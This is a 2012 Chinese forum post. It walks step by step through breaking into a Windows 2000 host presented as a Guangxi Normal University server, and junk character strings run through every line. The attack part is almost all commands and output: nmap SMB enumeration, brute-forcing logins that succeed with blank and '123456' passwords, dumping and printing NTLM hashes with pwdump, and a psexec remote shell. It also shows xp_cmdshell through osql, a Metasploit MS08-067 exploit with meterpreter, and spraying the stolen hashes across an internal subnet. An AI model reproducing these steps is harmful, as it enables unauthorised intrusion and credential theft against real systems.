广西师范网站http://202.103.242.241/8 H* t" u" i6 ^+ v+ W' e
0 q5 E- w3 g' {. Y# ?3 j* ~; @root@bt:~# nmap -sS -sV 202.103.242.241
6 |# `' r' b9 _* m
# ^! G9 p r/ D# hStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST8 Y# d% L7 l$ ?/ u
: E0 c' m1 p% c) h E- C0 L9 Z
Nmap scan report for bogon (202.103.242.241)
9 q: y' B' j7 q8 k0 h' m8 m( K4 l+ e" o ~2 e4 B
Host is up (0.00048s latency).
9 t) i O3 t- C9 }, R6 T. j: D7 V3 x, @* \9 d+ c) v+ g
Not shown: 993 closed ports$ | m9 e* R, j, ~ k4 X9 r
3 O' K3 S0 o, {
PORT STATE SERVICE VERSION: o4 I8 n7 a v0 `
5 h1 o) J1 _7 {: O! [135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
5 e! s$ m: z; M
, v, y( c1 [! h5 O* c: {139/tcp open netbios-ssn2 C- H/ |$ i) A- k) l: c2 X" z
! `( Z; I1 z- o
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
, j/ L% q" l+ z6 N. k. Y- O+ C! f0 k! F9 } O7 \7 F
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
5 C" T% A; e; Y/ R5 @$ P9 W# u# q7 e
1026/tcp open msrpc Microsoft Windows RPC K, q* ~( @' b; a; U
3 a" ~( ?( e' f0 i( J& e
3372/tcp open msdtc?
; W! A" V# }" }$ N0 j0 M% _6 S+ B
0 e5 X4 a1 o! F7 \' v, c3389/tcp open ms-term-serv?1 {( ]1 H+ m* ~ S
+ j# A0 ?7 x3 |" W1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
" I7 q( N6 ?3 h, J1 X3 f. c2 U8 }SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
+ D( c$ B/ {7 h! ]0 b5 T2 U6 I. B# @$ ~) g5 x5 u# V. e2 p
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
* g2 X, x; i' V7 W4 D- w5 z" a7 X# V( N% U4 ]6 ?2 d
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”): z8 b" `: J4 u6 e! Y8 c
& D$ k7 _0 h& O0 }& CSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO2 P5 ? M; @6 ]# s9 V& Z) o/ x
: A6 v+ ?9 j: ^2 ~, n% }9 Q
SF:ptions,6,”hO\n\x000Z”);
6 A- l) @9 o* h( B/ n6 F2 n8 }. Q, T7 c$ X: G$ ? x: m( @+ g9 ?
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
. m) c# n& g' X) z+ ?" c0 q( K; B) ~4 I+ Z0 P1 }2 Y8 Q9 i" B3 I
Service Info: OS: Windows
) T( W$ O9 s$ F' d' I3 I |2 u
8 i/ ^3 |2 l4 N3 I+ N8 C$ l( U: ^0 TService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
- z& p3 q _& d/ o3 E
) p4 s# [# D+ n6 k# i4 }* YNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
' b0 N# C, Z5 r$ ~- i
# U8 R& Z% n/ O7 S l% Uroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本& A8 t, r1 l+ e1 s7 u8 @# x( E
/ p. T1 m1 ?& U# r-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse+ r5 I1 x, k+ S5 k. W5 L3 A/ g
" o* X0 g" d3 A
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse% H* |+ G/ ]7 V7 q
* }2 O6 e0 r8 H
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
# M6 ^' K/ _! {
3 t; D3 P# ~9 R7 ?+ A% M% ?-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
( ? M' }$ R* u; v. g
+ Y7 e, O6 g, M( M! t$ J-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse. c; Y( s% ^) h
" ^3 u7 `! B0 l( B9 ]* n9 B-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse& e9 q) @' `! R" E2 f* {3 L
# w6 n6 V: M. R& ^& A4 a7 M! {$ B-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
( g7 o% }% J1 N& t, w
3 X& D6 ]7 e- N* I-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse7 W" w- z: `; Q- B, y
5 F E9 G: P+ M& `# ~/ Z! B8 L
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse4 j# [9 M& C5 e2 p* A
+ e0 k5 Y* _" C# j
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse1 Z6 J1 v3 H2 Z8 W+ e3 J" P6 r
( k0 J+ j! ?6 n6 H1 L-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse; C, ]' d8 C9 Z- J; ]4 D9 V4 ~
c, ?$ |# J( m& ~
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse" s) Q ]% O. ]1 }/ w8 N9 j6 Y
4 o+ J& S* m4 s-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
$ |% }: u! N8 Z1 \* E9 K
1 X% [+ [. m- z+ f" l9 [-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse8 w& M8 t, i: h' z e z0 |2 g
1 z8 m0 @; g1 `8 w-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
8 Y# ^/ c& L$ x* l" |( h: X
2 q4 x8 _1 D! u9 s' t1 b3 Troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
) \+ S( J: i# N1 a( o* S! s# C& W; R: L0 i; ?1 X' @
//此乃使用脚本扫描远程机器所存在的账户名" h6 D& u6 T$ @6 Z' T& t
* U& E. u/ ^ j) {Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST! }" j2 s; M: m% Y7 t2 [
7 v- a4 x% d' i7 M+ @Nmap scan report for bogon (202.103.242.241)8 s% k# K/ V0 L& j) I( m; L ?; J/ _
1 I1 o8 U$ U, v
Host is up (0.00038s latency).
) o( d1 g( r+ v8 \$ z# O
- |' K0 [7 H! E! [0 I4 ZNot shown: 993 closed ports' x" c: s( s4 q, U) ~$ C; q
) j# m+ c8 v1 _9 \6 B7 tPORT STATE SERVICE% f' ~- \% G d3 o6 ~3 r5 l
l M, }5 S, f" |! i5 S
135/tcp open msrpc
1 o$ p( d' _0 b; C7 V3 i! y# K% j$ q4 m D
139/tcp open netbios-ssn
- z4 ?" j" V" k# Q& ?' |* W0 r& g2 C) P
445/tcp open microsoft-ds5 [4 Z! [9 j+ W
. v" i% S- y9 k, y( x" T1025/tcp open NFS-or-IIS5 v6 W) o* i T
% t, I* b3 z0 b& I1026/tcp open LSA-or-nterm
9 r# w; e5 l& f4 E0 v
4 m! Z" N# H9 R# J3372/tcp open msdtc9 X' I; Y/ H& [' v2 f
# I, e/ q+ b! _0 C8 w3389/tcp open ms-term-serv: H: \9 S% \! d) l& g0 h/ o2 p
+ P8 H% D" V6 e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 U+ w' j6 i- `4 M2 m& i
' U& E& u. u$ p
Host script results:5 S) f7 n4 ]0 v5 M
! F* F7 c% n% j6 l8 T| smb-enum-users:* n8 O# E. E1 U8 ?2 f, V0 S4 f
# d2 A& G$ a) t/ P. G* {! D|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果 B4 W6 D9 `5 y
, T/ G% N* z, b6 e. E8 ` S$ C- \
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
% I2 c2 J# E7 V9 A4 r' V* U$ Q0 L
& f8 |/ t8 t" x( I9 |8 Hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
! B$ C5 {) v8 `* Q$ f
* N- v' m, r6 V//查看共享
; h2 F, \" i, {. |! d1 y/ y4 c7 @7 C3 w9 i* @
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
8 c& k! E6 R: l& ^$ {- b/ Y
3 C- T4 H# c$ t9 _# P2 D$ {+ CNmap scan report for bogon (202.103.242.241)8 a) y6 B; G- Z$ j. R
, B: d6 ]8 M; u5 M: j" S! K) \
Host is up (0.00035s latency).
% Y7 l; c& v b' n1 l% d. c" Y
Not shown: 993 closed ports4 q) C4 M, y6 O( M
, K* t" g% J: ?/ D
PORT STATE SERVICE
5 Z9 p. H& r4 U" @8 r9 L0 W7 |+ r4 W, k2 Y1 l) H3 V* q# o' [
135/tcp open msrpc! T" B4 w# H1 r
- n7 h. }* ?1 L7 K0 U9 W7 h* o( W139/tcp open netbios-ssn' ~; m$ g7 B$ Z ?
6 k; G9 ?! f% e1 K8 G- ]% D/ t! y
445/tcp open microsoft-ds* ?* F8 h% V1 i5 s! ~
- ]" Y8 }' b/ P a0 c" I1025/tcp open NFS-or-IIS9 e6 z% f6 ^$ H! T
1 `% n% N& t+ o3 {" V1026/tcp open LSA-or-nterm
4 i# k" D0 U2 S) j$ D) ?0 N
2 R, N' I1 Q F' q7 |3372/tcp open msdtc
; _: E z! g$ U, G7 G) R5 c* B$ n3 L1 J. y- [: S$ f5 L) X
3389/tcp open ms-term-serv" _. T6 B8 y; @" ^/ O( n
- R" }+ T5 U9 }5 d* M* a3 P+ X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 N# l: o$ q; s/ O! q
g" l+ Z* @/ }0 V7 D- _Host script results:
3 h6 v/ m( c; ^4 c6 q
e( a& B a/ W! A| smb-enum-shares:* B* C) A0 A( R( n# P8 ?
2 N; N7 B: G+ }1 V3 o9 t* T! t
| ADMIN$( l2 d& t6 `8 r' B
, i) U# u6 | K4 @| Anonymous access: <none>
7 r! E4 c2 c' h3 w# v: V- L) z* z1 ?, |& Z2 g6 R
| C$
' O% F8 B- l: g5 T# z( W% u
0 n* y1 l. Y% n: ^( R4 U| Anonymous access: <none>
$ g" Z* @$ r7 T5 k& h/ }6 a: ]6 s$ b& e7 s2 r" M
| IPC$
N5 Q8 z3 ]4 u9 `, f8 X' [( _# @# h! G6 A1 e6 p- S; m
|_ Anonymous access: READ
& X- |7 I1 S X" W3 e4 N9 I0 [
/ ^9 ~) Y% x( V4 p2 eNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
! F4 o) q3 u P* k1 g$ K
/ i/ P! n$ q* ~2 J3 Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 / G+ \" i$ a9 c6 j8 C
4 g C5 A) I. f6 f" I
//获取用户密码+ w+ H+ p. a$ l# K( ]0 Y
! c1 R- Y: a9 ]% A g8 T4 w8 tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST5 J& d/ l$ w) x# G" M1 E3 v
4 d' T3 c9 T4 xNmap scan report for bogon (202.103.242.2418) L# r0 ]4 N; ]
4 V; a. H7 k& b8 K% DHost is up (0.00041s latency).
0 r2 X: \! q( P2 i$ d8 w
4 b1 N$ `& Z) yNot shown: 993 closed ports# U$ a! r' c; U1 u; y( V5 D8 l
8 f. p/ t* _: O( d
PORT STATE SERVICE
$ ? g2 e' c3 c! v2 i# L% `6 s7 u# e9 s6 ~; G/ O7 D) c( k
135/tcp open msrpc: ~5 k$ W7 Y$ [" b& W
# p3 p' |* I) t; a9 \8 r8 Y% G: I
139/tcp open netbios-ssn
; w9 W( x6 A4 e1 B
/ v5 G3 D% K" L( j6 B: Y! d445/tcp open microsoft-ds9 I. E+ v$ v- ~8 `$ @6 M+ V5 g V
% \" e* x- W2 l% g1025/tcp open NFS-or-IIS# m0 v5 n, l* I B" B! E" u
9 d8 ]: ^+ e. P4 v4 L4 R0 z( {1026/tcp open LSA-or-nterm
* u% v* {% B9 g4 ~
* M6 Z" B! m2 D1 o3372/tcp open msdtc
2 e: i0 c! ~9 S/ n
: p% P& f% K+ f+ u5 y' U3389/tcp open ms-term-serv' V9 x1 s9 d, ^
, ^' g( ?2 Y R" y, u UMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 y% Z0 C1 x6 m: ? W- Z, \
: E2 \) u& t1 _Host script results:
# y8 I$ c7 x5 L, \$ z( P9 s# G
# P- K: w) _8 @5 Q, L| smb-brute:
" W9 v6 b: R' j: N( }: _; j9 b1 k
% n6 B, u+ p; y, cadministrator:<blank> => Login was successful
* |1 N/ E2 I+ h8 k; V2 {
: t: e, a' e7 U: L# w|_ test:123456 => Login was successful
9 e# D3 `* K; E4 X
1 b) [; u& a! W5 v hNmap done: 1 IP address (1 host up) scanned in 28.22 seconds7 B, h# W8 u7 f7 i) [9 B
( O4 C% ?9 T- ^# m4 q$ o4 V9 s o
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash+ o M# \9 V& C: K' b
! H. R2 Y$ K2 l+ r' \, m
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data2 D' p6 K4 @2 [/ W' p- e/ q
( }" W/ _3 Q$ D# V# T( j9 Wroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
6 d5 x! z* X: t, [" U5 G4 }( d6 \3 q1 ?$ R
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1392 M( \' ?9 ~ I) \5 Z7 `' g) @
1 {5 G% h) g. O
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
# M4 I5 u1 I" q+ u, R3 A( K \( l+ G0 Q
Nmap scan report for bogon (202.103.242.241); a/ L: d J" q0 A% r
; P% i* Z7 u3 r5 d( R g
Host is up (0.0012s latency).
( ~6 b( n, d; T+ E/ i$ t7 ^0 [' N, K: I
PORT STATE SERVICE9 } D2 }4 o! z" O3 T r9 R; Q% ]& L) _
' z5 z0 B* O) j6 X, |
135/tcp open msrpc
- H! y! d9 n C( ^, R% ^0 `
: k4 t8 f2 }. u139/tcp open netbios-ssn o( Z; n& g( S$ L3 W7 @
: O/ {; b. ?# X- g7 L
445/tcp open microsoft-ds) l6 `8 A$ z' v! ]
7 [" h7 h4 p0 M9 `
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 V& ?) e2 y# i4 w4 p( ?: @: j& V; [
( q4 B- h' r+ j8 X1 a2 iHost script results:
4 D$ N E7 o. K2 d$ v- \
: b! W& z6 I. @$ j| smb-pwdump:- N5 Q* C0 U, _9 |# Z( M, k( O
N, M+ p# b" o: e8 f$ N* f
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************# @; E' R0 ^3 f
6 R' }$ L, _& u3 k- A. |' f/ I
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
8 q! A1 J$ n7 i4 ]: u8 Y' o6 N4 Z- d5 F: a
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 L$ Q* I1 I, q
$ a& v! X0 M7 ^! Y. k' b8 g2 e; J|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
7 n0 o& v% b0 d+ ^8 w: C
9 t' ^' {( ^! yNmap done: 1 IP address (1 host up) scanned in 1.85 seconds2 ]! [7 D. w) E+ {: Q
2 m" Y, g. e) H1 mC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell0 d5 {+ s( w8 ^8 V
0 N( U' C- {$ _6 Z/ G
-p 123456 -e cmd.exe& q w; }0 I g0 S. u, N. }
3 }. w" x6 y* c; V* ?/ D) MPsExec v1.55 – Execute processes remotely
" ^: Q0 ^3 y$ F* ]( j0 ^) r- W( ?: q# j# c+ t
Copyright (C) 2001-2004 Mark Russinovich0 A' I2 m8 n5 l6 D
5 r. J. g* O- y0 E# ^- h$ @Sysinternals – www.sysinternals.com
8 O: o }* p& p+ w* B% D% [% C, u; Z4 G ?: J t/ T7 {
Microsoft Windows 2000 [Version 5.00.2195]
& A6 q; L) C3 x! @, H2 G! N7 M; E* \ G* O' `( G. @$ G
(C) 版权所有 1985-2000 Microsoft Corp.' V3 \1 V1 Y Z7 R; E' Z$ N4 Z
; e: m4 d+ O3 q4 MC:\WINNT\system32>ipconfig
\ B2 C& s5 O0 ^2 l) C7 ^
7 M5 n% { U( q7 `) P$ ^Windows 2000 IP Configuration
% T0 Q, I; f% ]" O, ^* T9 c( T/ f% N) _
Ethernet adapter 本地连接:& `; g1 h n6 W9 e+ x& H
; s, G* e- c* m H" X
Connection-specific DNS Suffix . :
\% }1 ?: T! P5 U0 D) \. ~8 ], i1 q5 z% U* v7 g: K
IP Address. . . . . . . . . . . . : 202.103.242.2416 Z3 c8 o8 _ {2 O
. k% N% p4 P" J, W) L: v4 ]
Subnet Mask . . . . . . . . . . . : 255.255.255.09 \$ w0 _, M! ]3 _. p
- m2 i( h6 L# q' L7 l! Z
Default Gateway . . . . . . . . . : 202.103.1.1& Q) a" `1 D" ? a. q
9 g E7 L% M% M3 ~! S# Q
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
# e- i$ f7 t5 M
; |5 ?4 u& l hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞6 l9 k4 ]/ b, j7 N4 |
. K( k2 K4 n( R! {9 S
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST4 _) ?, p& G% R
) e, z6 A. O7 s5 a6 E7 f7 \7 MNmap scan report for bogon (202.103.242.241)# u8 v, ^4 ]9 C3 R
3 g2 P* v9 {2 c: `) r* nHost is up (0.00046s latency).5 Q" H$ _6 n2 z9 h
( o2 J$ X% e7 G) b i# INot shown: 993 closed ports. ]9 j5 h- g# E0 _8 b
* y' q8 M0 @1 f) B1 mPORT STATE SERVICE
) o+ Q9 u& @. J9 C$ U7 e5 X" W4 }6 s' y+ O% b; X. _ u
135/tcp open msrpc, A: Y- O1 Q& N V6 [6 m
' \' @' a6 t7 k- [ ~" L4 c0 ^
139/tcp open netbios-ssn
/ r1 ~' Z% V" \. W' j* O, } Z/ A. b- D
445/tcp open microsoft-ds; ~. F2 A, h# Q1 ~
" i; b* S& e' x. T
1025/tcp open NFS-or-IIS0 O. T, x# }! m0 `9 b
" [% ]6 q3 Q% f& {( C1026/tcp open LSA-or-nterm1 ]) V- T" Q5 U! |8 L
' u0 b9 O4 z9 b$ i" S5 U; I; z7 w' C3372/tcp open msdtc' A; k+ J* |& |2 a
$ n# ?' g. T0 O& E) Y" z0 `8 n! c) X3389/tcp open ms-term-serv
4 e. T1 J& R( L4 K: K; W
( Y, e! @% D5 T# E+ \2 I0 F$ |MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# }5 n: ~ H" s" C) y+ K, `
1 y' X0 S$ T. w9 j7 d; [; v$ CHost script results:
+ l; Y; F9 r8 ]$ \7 L& }5 }2 b7 \# a& A
| smb-check-vulns:- L+ Z7 s8 O' J d" j) K! t5 {
) U y1 C+ D4 z9 o; j
|_ MS08-067: VULNERABLE
) N* J' \( m6 C+ J- W' }& Z3 M! @9 x& U, t2 d: n
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
& g2 J- ]' q9 R7 _4 c9 p; Q0 N( ]
, Y6 p* c; G& Vroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
4 R5 ?( Q3 M7 j4 d R6 Q6 u1 P% b e) T5 v' T0 ]* a8 z
msf > search ms08
6 V: ^0 r: z' P2 ]) a2 j+ s* v a8 a u8 [8 O: _" K- {% u9 x
msf > use exploit/windows/smb/ms08_067_netapi
Z4 r6 c# ?; t6 E# B
* |9 h5 @3 v. w7 B, Mmsf exploit(ms08_067_netapi) > show options
. R8 D$ i% ~6 w# V$ D3 d/ p9 @7 E, m0 H+ m% @ P4 k$ K
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241 S7 P/ O2 p- Z
! N: |9 i2 F6 S- Vmsf exploit(ms08_067_netapi) > show payloads
$ s9 B* W9 |! \3 {* f5 L
/ {# `4 L1 a& v7 m9 amsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
6 h( ~6 w: _! p8 i
/ H# Q, f8 Y$ kmsf exploit(ms08_067_netapi) > exploit4 |. K- @' S1 u! S! J
- N* J; K4 O8 @5 k/ z/ h# o6 gmeterpreter >
$ `2 k: x0 j9 d* I) f1 X1 G j9 D8 u9 E3 @
Background session 2? [y/N] (ctrl+z)
9 w: Q* ]" R- [7 A' F" h. l- x( q) U5 K# z
msf exploit(ms08_067_netapi) > sessions -l" B$ G! K3 P E8 j
+ |. U$ ^+ h! W8 M2 P' X Q. lroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt; m* X7 n( L# i# F+ Y
% t' L& m) X( D
test0 P# r2 c& N2 x$ |& E! h
3 e p) I4 e1 d) H, radministrator6 M/ p1 C8 \! P/ P. p
: V d1 F4 A& H- Z, m* H
root@bt:/usr/local/share/nmap/scripts# vim password.txt
/ D- k1 C5 w0 B8 K7 y u: F* d* O; i; \% v2 x3 H+ I* e
44EFCE164AB921CAAAD3B435B51404EE
5 G* b. [1 z# J6 |. a; `8 F
- {" ?# X4 K# { rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ) g2 |2 {3 s y: v. M
& m: F1 d1 \! N& f( B; w
//利用用户名跟获取的hash尝试对整段内网进行登录9 o6 A" N4 s, Y+ A& J0 z; m Q7 T
8 T* H! {1 t! e0 i* e6 ?
Nmap scan report for 192.168.1.105
. Q6 ?2 |" b9 [+ t, m. p7 W7 G4 Y# U6 o! v! U S' ?
Host is up (0.00088s latency)." N5 C4 X% m/ a1 y) V4 l1 S+ \) O
6 d8 |" X; s+ Q4 z. b+ ]Not shown: 993 closed ports
7 q+ \; \3 O6 X2 f) F
/ j) ?) c8 o* r& l! l! C1 [5 OPORT STATE SERVICE. H7 d2 K4 u. f+ V3 a- d
* e `4 F$ d3 h# T; M* g' i135/tcp open msrpc
( |6 C1 L3 X7 Z ~
* s/ S& ?8 K& [' v& F% i& Z ]# B+ |139/tcp open netbios-ssn* |9 o, s0 V J7 M* A$ p
; N& k' C2 ]7 F2 e% E
445/tcp open microsoft-ds9 C% V/ V7 ~9 y# g. S% L
|" i) B' M; Y1 q; l; v! x1025/tcp open NFS-or-IIS
# G- B1 f, {( j( a: H. {8 t. H9 y$ I7 A E
1026/tcp open LSA-or-nterm
3 Q6 {7 M0 s3 `
9 i8 f; z0 n' J3 f3372/tcp open msdtc
& G: |# q" H0 Z5 W$ j* w- C! m, c& y) J- V
3389/tcp open ms-term-serv
! C3 @+ r, s0 o% r% v# h- m' Z, p3 B6 {
* Z# W/ _4 o/ i& CMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' Q) f2 l# w9 h
3 N9 T9 H _6 r! n/ }; w
Host script results:. o, O, W+ H% L7 _
1 o% [7 l8 V$ q" J$ s7 a' z1 s| smb-brute:
+ M6 v4 S! G$ c1 l. P
; s& u) ]; z1 ~5 B: a; n|_ administrator:<blank> => Login was successful* B+ X9 {* ?4 |1 k6 L: h
5 `* o) T, m) ^攻击成功,一个简单的msf+nmap攻击~~·
- u. X$ \, ]5 s8 g$ z) K# I# \) U; U( m. C! z
|
发表于 2012-12-4 12:46:42
收藏
支持
反对